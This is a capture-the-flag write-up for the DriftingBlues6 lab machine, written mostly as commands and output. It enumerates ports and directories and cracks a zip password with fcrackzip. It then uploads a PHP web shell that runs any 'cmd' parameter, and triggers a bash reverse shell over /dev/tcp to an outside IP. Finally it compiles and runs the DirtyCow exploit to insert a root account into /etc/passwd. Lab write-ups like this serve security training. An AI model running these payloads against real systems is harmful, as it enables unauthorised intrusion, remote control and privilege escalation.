DriftingBlues6 Writeup

sudo nmap -T4 -p- target

Host is up (0.10s latency).
Not shown: 65504 closed tcp ports (reset), 30 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt -z

===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 283]
/.htaccess            (Status: 403) [Size: 283]
/cgi-bin/             (Status: 403) [Size: 282]
/db                   (Status: 200) [Size: 53656]
/index                (Status: 200) [Size: 750]
/index.html           (Status: 200) [Size: 750]
/robots               (Status: 200) [Size: 110]
/robots.txt           (Status: 200) [Size: 110]
/server-status        (Status: 403) [Size: 287]
/textpattern          (Status: 301) [Size: 306] [--> http://target/textpattern/]
===============================================================
Finished
===============================================================

User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute
;)

gobuster dir -u http://target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .zip -t 50

===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 750]
/db                   (Status: 200) [Size: 53656]
/robots               (Status: 200) [Size: 110]
/spammer              (Status: 200) [Size: 179]
/spammer.zip          (Status: 200) [Size: 179]
Progress: 108079 / 441122 (24.50%)^C

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt spammer.zip

PASSWORD FOUND!!!!: pw == myspace4

unzip spammer.zip
Password: myspace4

cat creds.txt
mayer:lionheart

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

nc -nvlp 4444

curl http://target/textpattern/files/rce.php?cmd='bash%20-c%20%27bash%20-i%20>%26%20%2Fdev%2Ftcp%2F192.168.45.185%2F4444%200>%261%27'

python -c 'import pty; pty.spawn("/bin/bash")'

wget --no-check-certificate https://github.com/peass-ng/PEASS-ng/releases/download/20250904-4f33e9d0/linpeas.sh

chmod +x linpeas.sh
./linpeas.sh

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

wget --no-check-certificate https://www.exploit-db.com/download/40839

gcc -pthread 40839.c -o dirty -lcrypt
./dirty

/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: Complete line:
firefart:figsoZwws4Zu6:0:0:pwned:/root:/bin/bash